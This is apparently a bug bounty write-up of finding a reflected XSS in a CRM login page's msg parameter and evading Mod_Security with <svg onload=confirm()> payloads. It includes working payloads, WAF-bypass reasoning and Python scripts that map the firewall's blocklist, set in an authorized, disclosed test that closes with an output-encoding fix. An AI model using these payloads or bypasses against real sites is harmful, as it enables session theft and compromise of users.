The Discovery
It started like any other reconnaissance session. I was poking around crm.REDACTED.com, a customer relationship management system I had permission to test. The login page greeted me with a clean, professional interface - yellow header, standard username and password fields, nothing particularly exciting at first glance.

But then I did what any good bug hunter does: I opened the developer tools and started inspecting the page source. That's when something caught my eye.

The page was using a msg parameter in the URL to display messages. You could see it right there in the address bar: login.php?msg=REDACTED%20CRM%20User%20Login. This is always interesting - any user-controlled input that gets reflected back on the page is worth investigating for injection vulnerabilities. I also noted that the value was reflected inside a <div> element, which meant a closing </div> tag could break me out of the existing markup.
First Blood: Confirming Reflection
I started simple. Could I break out of the existing HTML structure and inject my own content? I modified the URL:
login.php?msg=</div>test
Boom. The word "test" appeared on the page exactly where I injected it. My content was being reflected without any encoding. This was a textbook reflected Cross-Site Scripting (XSS) scenario… or so I thought.
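If you want to check this kind of reflection without squinting at view-source every time, a few lines of Python will do it. This is a minimal sketch, assuming the requests library, a placeholder URL standing in for the redacted target, and an arbitrary marker string:

```python
import requests

# Placeholder URL standing in for the redacted target.
BASE_URL = "https://crm.example.com/login.php"

# A marker unlikely to appear naturally in the page source.
MARKER = "xss-probe-12345"

# Mirror the breakout payload: close the surrounding div, then add the marker.
payload = f"</div>{MARKER}"
resp = requests.get(BASE_URL, params={"msg": payload}, timeout=10)

if payload in resp.text:
    # The closing tag and marker came back verbatim: no output encoding.
    print("Reflected without encoding - worth digging into.")
else:
    print("Marker missing or encoded - no trivial reflection here.")
```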
Meeting the Guardian: Mod_Security
Time to escalate. If I could inject HTML, could I inject JavaScript? I tried the most basic XSS payload:
login.php?msg=</div><script>alert("hi")</script>
Not Acceptable!
"An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security."
Ah, there it was. The application had a Web Application Firewall (WAF), and it wasn't happy with my <script> tag. Fair enough - that's literally WAF 101. Let me try to be more subtle:
login.php?msg=</div><script></script>
Nope. Even an empty script tag triggered the WAF. Mod_Security was clearly watching for the <script> keyword. Time to think outside the box.
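As a side note, blocks like this are easy to spot programmatically: Mod_Security's "Not Acceptable!" page typically arrives with a 403 or 406 status instead of the normal login page. Here's a small sketch (same placeholder URL and hedges as above) that labels each payload as blocked or allowed:

```python
import requests

BASE_URL = "https://crm.example.com/login.php"  # placeholder for the redacted target

payloads = [
    '</div><script>alert("hi")</script>',
    "</div><script></script>",
]

for p in payloads:
    resp = requests.get(BASE_URL, params={"msg": p}, timeout=10)
    # Mod_Security blocks tend to surface as a 403/406 plus its error page
    # rather than the normal login page.
    blocked = resp.status_code in (403, 406) or "Mod_Security" in resp.text
    print(f"{p!r:50} -> {'BLOCKED' if blocked else 'allowed'}")
```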
The Pivot: SVG to the Rescue
The beautiful thing about XSS is that there are dozens of ways to execute JavaScript in a browser. <script> tags are just the most obvious. What about SVG elements? They can contain event handlers too, and many WAFs forget about them.
login.php?msg=</div><svg>
Success! The page loaded normally with my SVG tag intact. No WAF block. The guardian had a blind spot.
Dancing with the WAF
Now for the real test: could I add an event handler to execute JavaScript? I tried adding an onload event, with the space URL-encoded as %20 so the payload stayed intact in the address bar:
login.php?msg=</div><svg%20onload=alert("hi")>
Blocked again. Interesting. So the WAF wasn't just looking for <script> tags - it was also checking for alert(). This is common; many WAFs specifically blacklist alert() since it's the go-to function for XSS proof-of-concepts.
Let me try without the alert function:
login.php?msg=</div><svg%20onload=test>
It worked! The WAF allowed onload=test through. So the issue wasn't the event handler itself - it was the alert() function specifically. The WAF was doing function-name-based filtering, not structural analysis of whether JavaScript could execute.
This was my opening.
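The same blocked-or-allowed check makes it easy to run this whole onload series in one pass and see exactly where the filter draws the line. A sketch with the three variants from this stage (placeholder URL again):

```python
import requests

BASE_URL = "https://crm.example.com/login.php"  # placeholder for the redacted target

# Same <svg> structure throughout; only the onload body changes.
variants = [
    "</div><svg>",                      # bare tag
    '</div><svg onload=alert("hi")>',   # blacklisted function name
    "</div><svg onload=test>",          # harmless identifier, same structure
]

for p in variants:
    resp = requests.get(BASE_URL, params={"msg": p}, timeout=10)
    blocked = resp.status_code in (403, 406) or "Mod_Security" in resp.text
    print(f"{p!r:45} -> {'BLOCKED' if blocked else 'allowed'}")
```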
The Kill: Alternative Functions
If alert() was blacklisted but the event handler structure was allowed, I just needed a different function that would prove JavaScript execution. How about confirm()?
login.php?msg=</div><svg%20onload=confirm("XSS")>
BINGO!
The browser popped up a confirmation dialog with "XSS" in it. My JavaScript had executed. The WAF had no rule for confirm(), even though it serves the exact same proof-of-concept purpose as alert(). I had successfully bypassed Mod_Security.
Victory Lap
Just to confirm this wasn't a fluke, I tested another function:
login.php?msg=</div><svg%20onload=fetch()>
Again, no WAF block. The fetch() function - which could be used for actual data exfiltration in a real attack - also wasn't in their blocklist.
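If you want to map a blocklist like this more systematically, you can sweep a handful of candidate function names through the identical <svg onload=...> structure and note which ones Mod_Security objects to. Another hedged sketch with a placeholder URL - only run something like this against targets you are authorized to test:

```python
import requests

BASE_URL = "https://crm.example.com/login.php"  # placeholder for the redacted target

# Candidate function names to slot into the identical onload structure.
candidates = ["alert", "confirm", "prompt", "print", "fetch"]

for name in candidates:
    payload = f"</div><svg onload={name}()>"
    resp = requests.get(BASE_URL, params={"msg": payload}, timeout=10)
    blocked = resp.status_code in (403, 406) or "Mod_Security" in resp.text
    print(f"{name:10} -> {'BLOCKED' if blocked else 'allowed'}")
```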
The Report
I documented everything and submitted my findings to the security team. The vulnerability was confirmed, the disclosure was approved, and a patch was deployed.
Lessons Learned
This hunt perfectly illustrates why Web Application Firewalls are not silver bullets:
- Signature-based detection has inherent limitations - The WAF knew to block <script> and alert(), but it couldn't anticipate every possible attack vector.
- Creative encoding and alternative syntax bypass pattern matching - By using <svg> instead of <script> and confirm() instead of alert(), I achieved the same outcome while evading detection.
- WAFs create a false sense of security - The developers likely thought they were protected because they had Mod_Security deployed. In reality, the application was still vulnerable to XSS.
- Defense in depth is essential - The real fix wasn't improving the WAF rules (though that helped); it was properly encoding user input before displaying it on the page (see the sketch after this list).
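For a PHP application like this one, that fix usually means passing the value through htmlspecialchars() before echoing it. Here's the same idea sketched in Python with html.escape(), with a hypothetical banner div, just to show the principle: once the output is entity-encoded, the breakout payload renders as harmless text.

```python
import html

def render_msg(user_msg: str) -> str:
    # Encode the user-controlled value before it reaches the HTML response.
    # <, >, & and quotes become entities, so a breakout payload is rendered
    # as inert text instead of live markup.
    return f'<div class="banner">{html.escape(user_msg, quote=True)}</div>'

print(render_msg('</div><svg onload=confirm("XSS")>'))
# -> <div class="banner">&lt;/div&gt;&lt;svg onload=confirm(&quot;XSS&quot;)&gt;</div>
```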
This is why I love bug bounty hunting. Every application is a puzzle, every security control is a challenge, and every bypass teaches both attackers and defenders something valuable. The best security comes not from a single wall, but from layers of thoughtful protection.
And sometimes, all it takes to bypass that wall is thinking: "What if I use an SVG instead?"
This writeup describes testing performed with explicit written permission on a fully patched system with all domains and names redacted. Never test systems you don't have authorization to access.
